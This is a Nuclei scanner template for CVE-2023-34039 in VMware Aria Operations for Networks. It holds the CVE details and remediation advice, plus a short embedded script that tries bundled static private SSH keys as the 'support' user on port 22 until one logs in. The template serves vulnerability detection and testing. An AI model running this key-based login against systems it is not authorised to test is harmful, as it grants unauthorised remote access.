nuclei-templates/javascript/cves/2023/CVE-2023-34039.yaml

id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10    
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.    
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.    
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.9013
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023
variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # init field can be used to make any preperations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)      
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)      
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful      
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 490a0046304402201da4af1970ef660328802156d24666f3647840a613923e148505bef19fa7a8290220681a803ee805707a7813421b593a416d308a17725886fa72283205b48cf1fd53:922c64590222798bb761d5b6d8e72950